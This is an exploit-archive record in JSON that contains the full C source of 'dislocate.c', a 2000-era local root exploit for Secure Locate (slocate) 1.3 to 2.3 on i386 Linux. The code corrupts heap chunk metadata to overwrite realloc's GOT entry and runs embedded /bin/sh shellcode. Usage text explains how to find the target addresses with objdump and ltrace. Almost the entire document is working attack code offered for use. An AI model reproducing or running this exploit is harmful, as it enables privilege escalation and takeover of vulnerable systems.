dislocate - Local i386 exploit in v1.3

2000-12-02T00:00:00

Description

Exploit for linux platform in category local exploits

{"id": "1337DAY-ID-7265", "type": "zdt", "bulletinFamily": "exploit", "title": "dislocate - Local i386 exploit in v1.3", "description": "Exploit for linux platform in category local exploits", "published": "2000-12-02T00:00:00", "modified": "2000-12-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/7265", "reporter": "Michel Kaempf", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-10T03:05:48", "viewCount": 7, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/7265", "sourceData": "======================================\r\ndislocate - Local i386 exploit in v1.3\r\n======================================\r\n\r\n/*\r\n * MasterSecuritY <www.mastersecurity.fr>\r\n *\r\n * dislocate.c - Local i386 exploit in v1.3 < Secure Locate < v2.3\r\n * Copyright (C) 2000 Michel \"MaXX\" Kaempf <[email\u00a0protected]>\r\n *\r\n * Updated versions of this exploit and the corresponding advisory will\r\n * be made available at:\r\n *\r\n * ftp://maxx.via.ecp.fr/dislocate/\r\n *\r\n * This program is free software; you can redistribute it and/or modify\r\n * it under the terms of the GNU General Public License as published by\r\n * the Free Software Foundation; either version 2 of the License, or\r\n * (at your option) any later version.\r\n *\r\n * This program is distributed in the hope that it will be useful,\r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n * GNU General Public License for more details.\r\n *\r\n * You should have received a copy of the GNU General Public License\r\n * along with this program; if not, write to the Free Software\r\n * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n\r\n#define PATH \"/tmp/path\"\r\n\r\nchar *shellcode =\r\n \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n \"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\r\n\r\nvoid usage( char * string )\r\n{\r\n fprintf( stderr, \"* Usage: %s filename realloc malloc\\n\", string );\r\n fprintf( stderr, \"\\n\" );\r\n fprintf( stderr, \"* Example: %s /usr/bin/slocate 0x0804e7b0 0x08050878\\n\", string );\r\n fprintf( stderr, \"\\n\" );\r\n fprintf( stderr, \"* Realloc:\\n\" );\r\n fprintf( stderr, \" $ objdump -R /usr/bin/slocate | grep realloc\\n\" );\r\n fprintf( stderr, \"\\n\" );\r\n fprintf( stderr, \"* Malloc:\\n\" );\r\n fprintf( stderr, \" $ %s foobar 0x12121212 0x42424242\\n\", string );\r\n fprintf( stderr, \" $ cp /usr/bin/slocate /tmp\\n\" );\r\n fprintf( stderr, \" $ ltrace /tmp/slocate -d %s foobar 2>&1 | grep 'malloc(64)'\\n\", PATH );\r\n fprintf( stderr, \" $ rm %s\\n\", PATH );\r\n fprintf( stderr, \"\\n\" );\r\n}\r\n\r\nint zero( unsigned int ui )\r\n{\r\n if ( !(ui & 0xff000000) || !(ui & 0x00ff0000) || !(ui & 0x0000ff00) || !(ui & 0x000000ff) ) {\r\n return( -1 );\r\n }\r\n return( 0 );\r\n}\r\n\r\nint main( int argc, char * argv[] )\r\n{\r\n unsigned int ui_realloc;\r\n unsigned int ui_malloc;\r\n char path[1337];\r\n char next[1337];\r\n char * execve_argv[] = { NULL, \"-d\", PATH, next, NULL };\r\n int fd;\r\n unsigned int p_next;\r\n unsigned int ui;\r\n\r\n if ( argc != 4 ) {\r\n usage( argv[0] );\r\n return( -1 );\r\n }\r\n execve_argv[0] = argv[1];\r\n ui_realloc = (unsigned int)strtoul( argv[2], NULL, 0 );\r\n ui_malloc = (unsigned int)strtoul( argv[3], NULL, 0 );\r\n\r\n strcpy( next, \"ppppssssffffbbbb\" );\r\n p_next = (0xc0000000 - 4) - (strlen(execve_argv[0]) + 1) - (strlen(next) + 1);\r\n for ( ui = 0; ui < p_next - (p_next & ~3); ui++ ) {\r\n strcat( next, \"X\" );\r\n }\r\n p_next = (0xc0000000 - 4) - (strlen(execve_argv[0]) + 1) - (strlen(next) + 1);\r\n\r\n ui = 0;\r\n *((unsigned int *)(&(next[ui]))) = (unsigned int)(-1);\r\n\r\n ui += 4;\r\n *((unsigned int *)(&(next[ui]))) = ((ui_malloc - 8) + 136) - p_next;\r\n if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {\r\n fprintf( stderr, \"debug: next->size == 0x%08x;\\n\", *((unsigned int *)(&(next[ui]))) );\r\n return( -1 );\r\n }\r\n\r\n ui += 4;\r\n *((unsigned int *)(&(next[ui]))) = ui_realloc - 12;\r\n if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {\r\n fprintf( stderr, \"debug: next->fd == 0x%08x;\\n\", *((unsigned int *)(&(next[ui]))) );\r\n return( -1 );\r\n }\r\n\r\n ui += 4;\r\n *((unsigned int *)(&(next[ui]))) = ui_malloc;\r\n if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {\r\n fprintf( stderr, \"debug: next->bk == 0x%08x;\\n\", *((unsigned int *)(&(next[ui]))) );\r\n return( -1 );\r\n }\r\n\r\n ui = 0;\r\n path[ui] = (char)(256 - 4);\r\n\r\n ui += 1;\r\n *((unsigned int *)(&(path[ui]))) = p_next - (ui_malloc - 8);\r\n if ( zero( *((unsigned int *)(&(path[ui]))) ) ) {\r\n fprintf( stderr, \"debug: oldp->size == 0x%08x;\\n\", *((unsigned int *)(&(path[ui]))) );\r\n return( -1 );\r\n }\r\n\r\n ui += 4;\r\n path[ui] = 0;\r\n strcat( path, \"\\xeb\\x0axxyyyyzzzz\" );\r\n strcat( path, shellcode );\r\n\r\n fd = open( PATH, O_WRONLY|O_CREAT|O_EXCL, S_IRWXU );\r\n if ( fd == -1 ) {\r\n fprintf( stderr, \"debug: open( \\\"%s\\\", O_WRONLY|O_CREAT|O_EXCL, S_IRWXU ) == -1;\\n\", PATH );\r\n return( -1 );\r\n }\r\n write( fd, \"0\", sizeof(\"0\") );\r\n write( fd, \"\", sizeof(\"\") );\r\n write( fd, path, strlen(path) );\r\n close( fd );\r\n\r\n execve( execve_argv[0], execve_argv, NULL );\r\n return( -1 );\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "_state": {"dependencies": 1647179039, "score": 1659766679, "epss": 1678811959}}